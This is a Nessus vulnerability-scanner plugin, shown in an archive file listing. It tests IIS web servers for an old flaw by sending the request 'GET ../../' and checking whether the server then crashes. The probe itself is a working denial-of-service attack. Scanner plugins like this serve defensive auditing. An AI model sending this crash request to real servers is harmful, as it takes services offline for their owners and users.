home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / iis_crash.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  77 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10117);
  11.  script_bugtraq_id(2218);
  12.  script_version ("$Revision: 1.19 $");
  13.  script_cve_id("CAN-1999-0229");
  14.  name["english"] = "IIS 'GET ../../'";
  15.  name["francais"] = "IIS 'GET ../../'";
  16.  
  17.  
  18.  script_name(english:name["english"],
  19.          francais:name["francais"]);
  20.  
  21.  # Description
  22.  desc["english"] = string("It is possible to crash IIS by sending it the request 'GET ../../'\nSolution: upgrade to the latest version.\nRisk factor : High");
  23.  
  24.  desc["francais"] = string("Il est possible de faire planter un serveur IIS en lui envoyant la requete 'GET ../../'\nSolution: mettez votre serveur IIS α jour.\nFacteur de risque : ElevΘ");
  25.  
  26.  script_description(english:desc["english"],
  27.              francais:desc["francais"]);
  28.  
  29.  # Summary
  30.  summary["english"] = "Performs a denial of service against IIS";
  31.  summary["francais"] = "Provoque un dΘni de service contre un serveur IIS";
  32.  script_summary(english:summary["english"],
  33.          francais:summary["francais"]);
  34.  
  35.  # Category
  36.  script_category(ACT_DENIAL);
  37.  
  38.  # Dependencie(s)
  39.  script_dependencie("find_service.nes", "http_version.nasl", "www_fingerprinting_hmap.nasl");
  40.  
  41.  # Family
  42.  family["english"] = "Denial of Service";
  43.  family["francais"] = "DΘni de service";
  44.  script_family(english:family["english"],
  45.             francais:family["francais"]);
  46.  
  47.  # Copyright
  48.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  49.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  50.  
  51.  script_require_ports("Services/www", 80);
  52.  exit(0);
  53. }
  54.  
  55. # The attack starts here
  56.  
  57. include("http_func.inc");
  58.  
  59. port = get_http_port(default:80);
  60.  
  61. sig = get_kb_item("www/hmap/" + port + "/description");
  62. if ( sig && "IIS" >!< sig ) exit(0);
  63. if(get_port_state(port))
  64. {
  65.  data = string("GET ../../\r\n");
  66.  soc = open_sock_tcp(port);
  67.  if(soc)
  68.  {
  69.   send(socket:soc, data:data);
  70.   close(soc);
  71.   sleep(2);
  72.   soc2 = open_sock_tcp(port);
  73.   if(!soc2)security_hole(port);
  74.   else close(soc2);
  75.  }
  76. }
  77.